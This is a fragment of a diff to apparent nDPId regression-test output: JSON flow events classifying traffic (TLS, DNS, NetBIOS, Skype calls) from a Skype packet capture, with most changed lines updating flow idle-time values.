+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970642412,"flow_last_seen":1431970643680,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970642408,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
@@ -1064,36 +1064,36 @@ 00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634730,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":199,"flow_first_seen":1431970682971,"flow_last_seen":1431970705724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":77329,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":199,"flow_first_seen":1431970682971,"flow_last_seen":1431970705724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":77329,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00844{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
